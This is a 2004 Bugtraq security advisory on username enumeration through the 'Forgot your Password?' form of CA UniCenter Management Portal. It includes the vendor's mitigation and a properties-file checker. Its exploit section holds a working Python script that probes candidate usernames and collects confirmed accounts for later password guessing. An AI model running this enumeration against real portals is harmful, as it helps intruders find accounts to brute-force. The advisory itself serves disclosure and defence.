
List:       bugtraq
Subject:    CA UniCenter Management Portal Username Enumeration Vulnerability
From:       thomas adams <tgadams () bellsouth ! net>
Date:       2004-09-21 17:58:35
Message-ID: 20040921175835.14829.qmail () www ! securityfocus ! com



CA UniCenter Management Portal Username Enumeration Vulnerability

Package:                CA UniCenter Management Portal
Vendor Web Site:        http://www.ca.com
Versions:               UniCenter Management Portal 2.0 and 3.1
Platform:               Windows
Local:                  No
Remote:                 Yes
Fix Available:          Yes
Advisory Author:        Thomas Adams (tgadams@bellsouth.net)


Background:
From www.ca.com: "Unicenter Management Portal provides intuitive access to
enterprise management information, offering a personalized web interface for
various Unicenter management solutions. Security and administrative control
are provided through pre-defined workplaces. Filtered event notifications can
be customized to suit individual roles and responsibilities, for personalized
views tailored to your users' unique needs." The portal provides a 'Forgot
your Password?' link whose response differs depending on whether the submitted
username exists. Using a script, an attacker can quickly enumerate the users
that have access to the web interface with the technique below. This makes
password brute-force attacks against the server far more effective, since the
attacker only has to guess passwords for accounts known to exist.



Exploit:
Connect to the management portal (default port 8080) and choose the 'Forgot
your Password?' option. Enter a username, such as test. If the test account
does not exist, the portal displays: "User not found: test". A valid account
instead produces either a "Password has been sent" or an "Email address not
Found" message; both of the latter confirm that the account exists. Because
the submitted name is echoed back in the failure message, the three responses
can be told apart mechanically.
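As an added example (not code from the original advisory or from CA), the following script drives the 'Forgot your Password?' form and classifies each response with the three strings quoted above. The advisory gives only the strings and the default port; the form path (FORGOT_PATH) and the form field name (USER_FIELD) are assumptions and have to be replaced with the values taken from the portal's own page.

```python
"""
Added example, not part of the advisory or of the CA product: a response
oracle for the 'Forgot your Password?' form.  The three response strings
are the ones quoted in the advisory.  FORGOT_PATH and USER_FIELD are
assumed placeholders, not values documented anywhere on the page.
"""
import urllib.parse
import urllib.request
from typing import Dict, Iterable, List

# Response fragments quoted in the advisory.
NOT_FOUND_PREFIX = "User not found: "
PASSWORD_SENT = "Password has been sent"
EMAIL_NOT_FOUND = "Email address not Found"

# Assumptions: the advisory does not give the form path or field name.
FORGOT_PATH = "/forgotPassword"
USER_FIELD = "username"


def classify_response(body: str, username: str) -> str:
    """Turn one response body into an oracle verdict.

    'invalid'  the portal said the account does not exist
    'valid'    the account exists: a password was mailed, or it has no
               e-mail on file (both messages only appear for real users)
    'unknown'  none of the three strings, e.g. an error page, a different
               build, or the feature disabled as in the vendor fix
    The echoed username must match, so unrelated text that happens to
    contain "User not found" is not mistaken for a negative result.
    """
    if NOT_FOUND_PREFIX + username in body:
        return "invalid"
    if PASSWORD_SENT in body or EMAIL_NOT_FOUND in body:
        return "valid"
    return "unknown"


def forgot_password(base_url: str, username: str, timeout: float = 10.0) -> str:
    """POST one username to the (assumed) form and return the response body."""
    data = urllib.parse.urlencode({USER_FIELD: username}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + FORGOT_PATH, data=data)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def enumerate_users(base_url: str, candidates: Iterable[str]) -> Dict[str, str]:
    """Probe each candidate name and collect its verdict.

    Caveat for the tester: a 'valid' hit via "Password has been sent" means
    the portal really mailed that user's password, so every probe of a real
    account is visible to its owner and in the mail logs.
    """
    verdicts: Dict[str, str] = {}
    for name in candidates:
        verdicts[name] = classify_response(forgot_password(base_url, name), name)
    return verdicts


def valid_accounts(verdicts: Dict[str, str]) -> List[str]:
    """Names the oracle confirmed, in probe order, for a follow-on attack."""
    return [name for name, verdict in verdicts.items() if verdict == "valid"]


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "http://portal.example:8080"
    wordlist = ["test", "admin", "portal", "guest"]  # constructed sample list
    for name in valid_accounts(enumerate_users(target, wordlist)):
        print(name)
```

Run it against a portal with a real wordlist only with authorisation; a run of 'unknown' verdicts is the expected result once the vendor's fix is in place, because the form then no longer returns any of the three strings.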



Vendor Response:
CA's recommendation was to disable the 'Forgot Password' feature. To disable
this option in the Portal, add the following line to the
[PORTAL_INSTALL]\properties\local.properties file:
show.passwords.in.api=false

You will need to restart the portal after manually editing the file. Note
that this removes the self-service reset altogether rather than making its
responses uniform, so users will have to go through an administrator for
password resets.
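As an added example (not a CA tool), the following reads the portal's local.properties and reports whether the vendor's mitigation line is in effect. The parser follows the Java .properties conventions the file is assumed to use: '#' or '!' comment lines, '=' or ':' or whitespace as separator, surrounding whitespace ignored, a trailing backslash continuing the line, and the last definition of a key winning. The sample file contents are constructed here.

```python
"""
Added example, not part of the advisory or of the CA product: check that
show.passwords.in.api=false is the effective value in local.properties.
Assumes the file uses Java .properties syntax; unicode escapes are not
handled, which is fine for this key.
"""
from typing import Dict

MITIGATION_KEY = "show.passwords.in.api"  # the property name CA gave


def parse_properties(text: str) -> Dict[str, str]:
    """Minimal Java-style .properties parser; later definitions override."""
    props: Dict[str, str] = {}
    pending = ""  # accumulated text of a backslash-continued line
    for raw in text.splitlines():
        line = raw.strip()
        if pending:
            line = pending + line
            pending = ""
        elif not line or line[0] in "#!":
            continue  # blank or comment line (comments cannot be continued)
        # An odd number of trailing backslashes means the line continues.
        trailing = len(line) - len(line.rstrip("\\"))
        if trailing % 2 == 1:
            pending = line[:-1]
            continue
        # The key ends at the first unescaped '=', ':' or whitespace.
        sep = next(
            (i for i, ch in enumerate(line)
             if ch in "=: \t" and (i == 0 or line[i - 1] != "\\")),
            len(line),
        )
        key = line[:sep].replace("\\=", "=").replace("\\:", ":").replace("\\ ", " ")
        rest = line[sep:].lstrip(" \t")
        if rest[:1] in ("=", ":"):
            rest = rest[1:].lstrip(" \t")
        if key:
            props[key] = rest
    return props


def mitigation_applied(text: str) -> bool:
    """True only if the effective value is exactly 'false'.

    Any other spelling ('False', 'FALSE', a missing key) is reported as not
    applied, since the advisory does not say how the portal parses the
    value; an operator should then look at the file rather than trust it.
    """
    return parse_properties(text).get(MITIGATION_KEY) == "false"


def check_file(path: str) -> bool:
    """Read local.properties from disk and report the mitigation status."""
    with open(path, encoding="latin-1") as fh:  # .properties default encoding
        return mitigation_applied(fh.read())


# Constructed sample contents, not taken from a real installation.
SAMPLE_BEFORE = (
    "# constructed sample: no mitigation line present\n"
    "portal.name = Unicenter Management Portal\n"
)
SAMPLE_AFTER = SAMPLE_BEFORE + "show.passwords.in.api=false\n"
SAMPLE_OVERRIDDEN = SAMPLE_AFTER + "show.passwords.in.api = true\n"  # last wins

if __name__ == "__main__":
    import sys

    for path in sys.argv[1:]:
        print(path, "mitigated" if check_file(path) else "NOT mitigated")
```

The duplicate-key case is the one worth checking in practice: a mitigation line appended to the end of the file is silently undone if a later edit re-adds the key with another value, and a line-by-line grep for the string would still report it as present.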

